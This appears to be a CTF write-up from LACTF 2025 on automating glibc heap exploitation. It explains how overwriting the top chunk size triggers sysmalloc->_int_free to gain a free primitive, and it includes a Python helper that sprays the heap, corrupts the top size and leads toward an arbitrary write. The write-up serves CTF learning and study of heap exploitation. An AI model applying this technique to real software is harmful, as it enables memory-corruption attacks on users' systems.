Automating triggering _int_free for faster pwnage

󰃭 0001-01-01

I played in LACTF 2025 and I wanted to quickly share how I was able to automate triggering sysmalloc->_int_free for faster pwnage and calling free at will instead of having to do it manually each time. The challenge that I made the functionality for was called lamp, by enzocut.

Often times we need to get really creative with exploitation… Sometimes when heap grooming in GLIBC, we won’t have a user controlled free primitive we can use off the bat, but in these situations given you have a OOB/BOF on the heap it’s possible to trigger the sysmalloc->_int_free primitive, but doing it manually is a pain! So lets automate it…

What is _int_free? _int_free is the function that does the magic behind freeing data but why is this called within sysmalloc? Well, if we try to allocate a size larger than the top chunk can dish out to us then sysmalloc will call _int_free on the top chunk, this happens when the top chunk fails to get merged during heap growth.

We can trigger this by overwriting the top size with a size that’s smaller then a size we can allocate, but before moving on lets talk about some checks we need to bypass:

/* Record incoming configuration of top */
old_top = av->top;
old_size = chunksize (old_top);
old_end = (char *) (chunk_at_offset (old_top, old_size));

...

assert ((old_top == initial_top (av) && old_size == 0) ||
        ((unsigned long) (old_size) >= MINSIZE &&
        prev_inuse (old_top) &&
        ((unsigned long) old_end & (pagesize - 1)) == 0));
...

The three checks that we must pass are as follows:

  1. The incoming size must be greater than MINSIZE (0x10)
  2. Prev inuse bit is set for the overwritten size field
  3. The address at (top pointer + new size) must be page aligned

If we pass these checks than the next time we allocate a size larger then the top size, boom new freed chunk on the heap, this gives us a free primitive.


My _int_free automation function for the challenge

def trigger_int_free(new_top_size: int, heap_top: int) -> int:
    next_top_ptr = get_next_page_aligned_address(heap_top)
    offset_till_stop = (next_top_ptr - heap_top) - new_top_size
    current_top_addr = heap_top
    chunk_sizes = {
        0x10: 0x20, 
        0x20: 0x30, 
        0x30: 0x40, 
        0x40: 0x50, 
        0x50: 0x60, 
        0x60: 0x70, 
        0x70: 0x80,
        0x80: 0x90, 
        0x90: 0xa0, 
        0xa0: 0xb0,
        0xb0: 0xc0,
        0xc0: 0xd0,
        0xd0: 0xe0,
        0xe0: 0xf0,
        0xf0: 0x100
    }

    # Insure we set the prev_inuse bit
    if new_top_size | 1 != new_top_size:
        new_top_size = new_top_size | 1

    # Heap spray to get the heap in a place where the top pointer is at a distance of top+new_top_size+min_size_alloc == next page aligned address
    while offset_till_stop > new_top_size:
        for (key, chunk_mass) in dict([i for i in reversed(list(chunk_sizes.items()))]).items():
            if offset_till_stop >= chunk_mass:
                size_to_alloc = key
                offset_till_stop -= chunk_mass
                current_top_addr += chunk_mass
                alloc(size_to_alloc)
                break

            else:
                alloc(0x10)
                current_top_addr += 0x20
                offset_till_stop -= 0x20
                break

        if size_to_alloc == 0:
            break

        if offset_till_stop - size_to_alloc < new_top_size:
            continue

        print(f"Allocating {hex(size_to_alloc)}. Remaining offset_till_stop: {hex(offset_till_stop)}")

    page_aligned = get_next_page_aligned_address(current_top_addr)
    offset_now = page_aligned - current_top_addr

    print(f"Finding suitable allocatiion size for last alloc for overwrite... {current_top_addr:#0x} {page_aligned:#0x}")

    for (alloc_size, heap_mass) in chunk_sizes.items():
        operation = (heap_mass + new_top_size) - offset_now -1
        print(f"{heap_mass:#0x} + {new_top_size:#0x} - {offset_now:#0x} - 1 = {operation:#0x}")
        
        if operation == 0:
            alloc_and_write(alloc_size, b"A"*alloc_size + p64(0) + p64(new_top_size))  # Overwrite top chunk size field
            alloc(new_top_size+0x8)  # Trigger _int_free
            return current_top_addr + 0x200f0 + alloc_size

So, okay we see the script but how did we get to this point? in order to automate sysmalloc->_int_free?

  1. Either a predictable top chunk offset from the next page aligned chunk or a heap leak for calculating the top pointer.
  2. A size to overwrite the top with.

Taken the variables given we can do a rough calculation that we need to heap spray until top+new_top_size+min_size_alloc == next page aligned address

Given these details we can essentially create functionality for any given scenerio where we might want to automate triggering sysmalloc->_int_free for freed chunks on the heap.

Now that we crafted a free primitive, we can trigger a bunch of frees do a first fit and write bytes linearly to the next freed chunk overwrite its FD and gain an arbitrary write primitive.